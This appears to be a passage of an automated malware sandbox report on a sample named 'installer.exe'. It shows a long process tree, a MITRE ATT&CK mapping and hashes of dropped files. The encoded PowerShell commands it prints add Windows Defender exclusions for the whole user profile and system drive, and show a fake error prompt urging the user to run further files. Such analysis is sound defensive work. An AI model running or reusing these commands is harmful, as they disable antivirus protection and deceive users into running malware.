        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        48⤵
        System Location Discovery: System Language Discovery
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        48⤵
        Checks computer location settings
        
        PID:7824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        49⤵
        System Location Discovery: System Language Discovery
        
        PID:7972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        49⤵
        System Location Discovery: System Language Discovery
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        49⤵
        Checks computer location settings
        
        PID:7792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        50⤵
        
        PID:7404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        50⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        50⤵
        Checks computer location settings
        
        PID:8072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        51⤵
        
        PID:9368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        51⤵
        
        PID:9404
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        51⤵
        Checks computer location settings
        
        PID:9444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        52⤵
        
        PID:9728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        52⤵
        System Location Discovery: System Language Discovery
        
        PID:9776
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        52⤵
        Checks computer location settings
        
        PID:9852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        53⤵
        System Location Discovery: System Language Discovery
        
        PID:10140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        53⤵
        System Location Discovery: System Language Discovery
        
        PID:10188
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        53⤵
        Checks computer location settings
        
        PID:10212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        54⤵
        
        PID:2580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        55⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        54⤵
        
        PID:9244
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        54⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:7192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        55⤵
        
        PID:10008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10008 -s 2028
        56⤵
        Program crash
        
        PID:428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        55⤵
        System Location Discovery: System Language Discovery
        
        PID:728
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        55⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:9308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        56⤵
        
        PID:224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        56⤵
        
        PID:10044
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        56⤵
        Checks computer location settings
        
        PID:7652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        57⤵
        
        PID:7500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        57⤵
        
        PID:10056
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        57⤵
        Checks computer location settings
        
        PID:208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        58⤵
        System Location Discovery: System Language Discovery
        
        PID:7728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        58⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        58⤵
        Checks computer location settings
        
        PID:8420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        59⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        59⤵
        
        PID:8584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8420 -s 592
        59⤵
        Program crash
        
        PID:7424

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv WxIrdj3ONEW/s+oMi72IaA.0.2
1⤵
PID:5400

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:7064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 10008 -ip 10008
1⤵
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 8420 -ip 8420
1⤵
PID:9308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4cc9e7069534f7bcbb90ad7cac69ed78

SHA1
a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

SHA256
4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

SHA512
e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
42bce405722f84e424c529dba9fa4842

SHA1
7ca7f8d251f921f948d99cf0f36de7cbd2ba7821

SHA256
f962c118b560257a3ac3b52c53d19a26c77b7a65031a8ee9871c05c027c0b146

SHA512
61b6462a17cb6d5d3ff624a72d62286b3021ae093dc58cf1a84733d3bcb817a1fee0ba7a7b152a3bbec75b8e3eafafbc044817c2ca3f937247d28823a0d52d74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
59ee2cbb816d302222eac213ab2e8baf

SHA1
e678eabc8b2c295e7545fe187e276701ddd11cfb

SHA256
8a1145f710de4800a51d26d19e57c19cab856923a4286511b411ffc4d38d2cbf

SHA512
2216516dd8b02424a2318de8778fa2c67a7f3e0786b37c7128b9628c789916571c2c52e5472a3b050adf225b186389adf6d454553b0a53ab441ad0d6f6bf22b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
745ccba66e7f806a53d090d5e9b4068e

SHA1
fef06182f2f90adb2f0c2f7c12255b0f991c568d

SHA256
ab377eadb742cee7f3b6fb15e190bdde8ab71d059e3d9713723bafe51bc8fbd0

SHA512
04d9869960ca415db5901956c46fb1ffc199da0d8075e76c94ca8dd61cbcb5d7680562a123f746cc6efbeba375b34c92b0ac3ef39b02ab3aafb4ad0a0f4a9aaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
05d8202d8948ee1a4d6994ecde711022

SHA1
33e7a39df6ad2b4f09639c902fbfa353a22466b1

SHA256
d3f5980dd5f1c3d1f12246594aff6521d8b87bd6d05d661a6de648c3be062f41

SHA512
7a544eedbb294637ddfc6ead01c5f47e1ad726310840adcc4043c8e4eb1da3632aab9482b7babd79bf6c0ba90b5e40932cc567e4f2530caf8c82a7fafd23a97a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
0b7df220ea6d6199a01fe10553f4d2f4

SHA1
b139f1dc3caf61f16d3d01827705640293472412

SHA256
5c816244576ce342174cdd31aa08bfcb19f14e4d170089812ab385a9fbee0cd9

SHA512
79ebeb0a3a77acea6d0904269673b7485d4895077c513cbda70f0b5afba5e19194549f8cc1ed920e33383b0ac81b85b7caa662cff50b2aa74babf1f6b659f4ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
33a18319ba51a6b2108ff55e6bbbb117

SHA1
a3ad8af0100288dcc0f612e6e77dfe6bd815a17e

SHA256
2704bd629c87092b9db1c3faaa1b97c7cc4d35cbd55ac3eeeeb450b4d36fc97d

SHA512
8e760623147a56f9d8377bb59008e7e8c4cd6b533ea4e1b49fc1115410ba43ffb84b0a4b476a0e56b4992e85ec60e3103feda6c7068dc9b920f976ba0d76369c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
b78bd4b63dea27e5b3ae4318e3aba860

SHA1
658875d8941cbc6fdb54332f5e6fe82d3309272a

SHA256
811c725807495d8eb7e0f5ac74ea9c9f4f7011185e86b97d7a6266f9b7b384ea

SHA512
ddcf7312eb0a818f30c598962fa578f6d9eb7b1013ee91bf7cc3909edf811f42e191b3369f2a01d718f2eca52a14ebc36fc86532e36d197e38b5c1c430cfac3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
8e9c81a32669445b97e2ce9bc5fee804

SHA1
e6062d21a17475da2f4b4c0f745cdb7aee4b481e

SHA256
9279e64c04f7828d895c7d9e1f015abb9401695861b0e7a84737e3b73262c4f8

SHA512
68784d7b3701cca29f557a3a755837d3968855d2df13d660dfbfb1735130835373fa2214f58617d1c7c138899e4b8dca9214a0397f3283e8637493929e92aef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
84679319f77fa63eabd714b453bef878

SHA1
31e458d95692338f87a366535f1ca8ed601b4f4a

SHA256
2235220ff4bb440873643fe40cbd8a1b90f5ccf68f174bfe6b27486392909197

SHA512
e1301845ba061507fb53003157d6f0d4dce304a53e1cc457cfa36c7d3ed2a15abb1e0c81e0e8d1032cedb705902b4d70b4c69d30a45a6de8f83ea1b8c469f712

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
73c1931ea37f3fdfc78cb5e0515ae709

SHA1
c98b814013d7747f7daa6f839860d4f4a2d3808b

SHA256
bf3c6fb99e3194ee8e45c111f8f62f87b312414b32ddb635266d782f041bdf09

SHA512
